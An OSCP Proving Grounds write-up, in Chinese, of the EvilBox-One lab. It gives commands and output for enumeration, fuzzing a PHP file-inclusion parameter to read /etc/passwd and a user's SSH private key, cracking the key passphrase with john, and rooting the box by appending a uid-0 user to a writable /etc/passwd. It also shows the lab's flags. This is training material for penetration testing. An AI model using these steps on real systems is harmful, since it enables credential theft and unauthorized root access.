OSCP - Proving Grounds - EvilBox-One
主要知识点
- 类似黑盒测试,毫无线索的情况下只能去猜,如果是php文件则会比较容易达到入侵的目的
- 即使有php文件了,由于不知道代码,只能测试一下有没有文件包含漏洞
- 所以反正没线索的时候,就只能猜
具体步骤
nmap扫描,只开放了80和22端口,而80端口也只是一个default页面,没有什么线索
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
但是nikto里包含了一些额外的信息, robots.txt和/secret/路径
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.212
+ Target Hostname: 192.168.56.212
+ Target Port: 80
+ Start Time: 2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
robots.txt中的内容是`Hello H4x0r`,没有发现有什么用处,线索也不太多,所以强行爆破/secret/路径寻找php文件,发现了evil.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.225.212/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 280]
/.htaccess.php (Status: 403) [Size: 280]
/.htpasswd.php (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/evil.php (Status: 200) [Size: 0]
强行试验一下有无文件包含漏洞,得知确实存在文件包含漏洞,而参数名为command
:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev
________________________________________________:: Method : GET:: URL : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500:: Filter : Response size: 0
________________________________________________command [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::
通过先后包含 /etc/passwd和/home/mowree/.ssh/id_rsa文件获取到key文件用于登录,这里需要注意,如果是在浏览器中打开 http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa ,则一定要用查看页面源码的 方式才能获取到格式化好的RSA key文件,否则无法使用
尝试用获得的key进行ssh登录,但是提示需要passphrase,试验了robots.txt里的内容,无效,用john爆破一下,获得了密码 unicorn,使用该passphrase可以成功登录
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa >id_rsa.hash C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ 登录后尝试了SUID,sudo -l都没有什么信息,但是在上传了linpeas.sh并运行后发现了 /etc/passwd对于所有用户都有读写权限
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10 2019 usr.bin.man═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
首先我们需要构造出一条记录,在插入到/etc/passwd后面就可以了
mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e